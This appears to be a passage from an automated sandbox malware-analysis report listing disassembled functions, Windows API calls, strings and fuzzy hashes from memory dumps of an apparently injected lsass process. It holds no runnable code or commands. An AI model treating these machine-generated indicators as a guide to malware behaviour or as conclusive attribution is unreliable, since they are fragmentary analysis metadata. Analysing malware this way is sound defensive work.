                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9B31
                                                          • GetLastError.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9B69
                                                          • FreeLibrary.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 2f7bb17091c3ad669aac45023b8a36a5db2972c06d5c6d1236e1bc469af265ea
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: 0A318421212B80D5FE11DB16A89C79D2394BB49BA0F5B0627DFAD4B792EF38C46C8314
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: 4684a3b6f03071b9fbdecb27535ffbe65efa07643c59d5347bdcf71fed77be26
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: 0E116022324B40C6F750CB62E89C71D66A0F788BE9F454217EB5E87B95CF39C9488744
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: 4059655588c06262bb9e9a5817a7e9d20f6ac25274a879b1308bfe414715c134
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: 6FD19776214B88C6EA70DB0AE49835E77A4F388B88F110517EBDD477AACF39C955CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: ac81ffba270cbcd8ca7ff8d8b8890d8c165ed8bf11482b1277a3e3b317920732
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: AE51AA71201B85D5FB19EB24E8DC69C23A1FB44B48F860917A7AD067A7EF74DA2CC350
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: cb7b1bf515307d281e61f84502089fd4659e2d19a194bc2e74b976beb2e9b607
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: 1D318D22705B91E2FA14DF26A98C72EA3A0BB44B84F0A40238F9807B56EF34D4798700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: 2107b0081469023aaed2b856a6d9ca0864ac4a40cee91d820bb639892fa8c1c3
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: CB1186213103D0D2FA14B73168DD3AE1251AB88794F574627EBB65B3C7DE38D82A4300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: cef2ec367b5bf5f88403ef2d8067b784126752e9b6ab15f0aec9f8f7e49451a6
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: 77010522705B8086FA14DB22A89C75962A1FB88FC0F8A41369F9943755DE39C9898780
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 4fe45aef8abda1118a3182d0fe23ad37238832c29f6318056cc31bcfd59596a4
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: F901DB66611740C6FB24DB21E88CB1D62A0BB44B45F160427DB9E067A6EF3EC85C8740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: d8837c5ce690130c2a4c636cf2b35a019e001dd55ce572a27a65843f68b2c2f6
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 53F08C32314784D2FB208B25E9DC35D6360F744BC8F8640238B894695ADE6DC69CCB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: b6175183439679ade4b9a440113b8254938e64d81a702bb967794fe07d2f2327
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: 70F082A6704B80D1FA14DB27B9AC11D6661BB48FC0F468133EF5A0BB1ACF2CC4598700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: bc4eda4bdc59daf6858a7535c881e29f7d45ea489bef3fdc95527cda0e1ce26c
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 77F06D62211741C5FA149B24A8CC36E2324AB897A0F56061B9BBA451E6DF3AC44CC600
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: d92c8a70047ee3f9f677c60f71c96e14274d0a7e76417ba7bd5f06a1eebfcb31
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: 42029332619B84C6E6A0CB55F49875EB7A0F3C4794F114117EBDE87BAADB78C498CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: 267105f87d7f451d57cd450934c05bd4599ec1585b1ac8a24cde59d035386c7e
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: EB519236604781CBF364CB16A8CCA5EB3A4F784B48F56411B9F9A43756DF39C859CB40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: 0c0c6ec8d55fc4081fdbc6933022197a2e818e3703d065431f4521513b37686d
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: 21517E36614781C7F728DF26A88CA1EB3A0F388B84F52411BDF9A43756DF39D8198B40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: 79ed82cb3cc7373dd659b777388e18cf0486bb0023f2a61f6dad9cd5929ad774
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: 8F61C276529B80C6F660CB25F49871EB7A0F388788F110517EBDD43BAADB78C9588B40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 30d110bfc8817b1b051e8d17fed5869de832b2bf3c623fb6e0d935533c0c0f97
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 4F111C26A19780D7FB24CB21E48C61E67B0FB44B80F060027DB9D07795EF7EC9688784
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: c941f4bbe2b58b1d907055fb575691ae6c21b1d66a7bad7ff054d329bd2a8ea4
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 04518132311780CAFB58CB15E48CB6C7791E754B98F164127DBAE4778ADB79C869C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: f47f5f019f57884b92e204f4c758bbf48bfba7d3a59aeef637baf0707637bc52
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: F4516D32204780CAFB749F25958C36C7BA0F365B94F164117DB9987BD6CB39C4A8CB05
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: 33230b6d4da0d55998f3ab9552fef6bdcd87ec8b0b7b95ee5cafcaf9663b412d
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 90513D322007C0CAFB748B56958C35C77A1F7A6B98F264117DBE947B96CB38E869C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
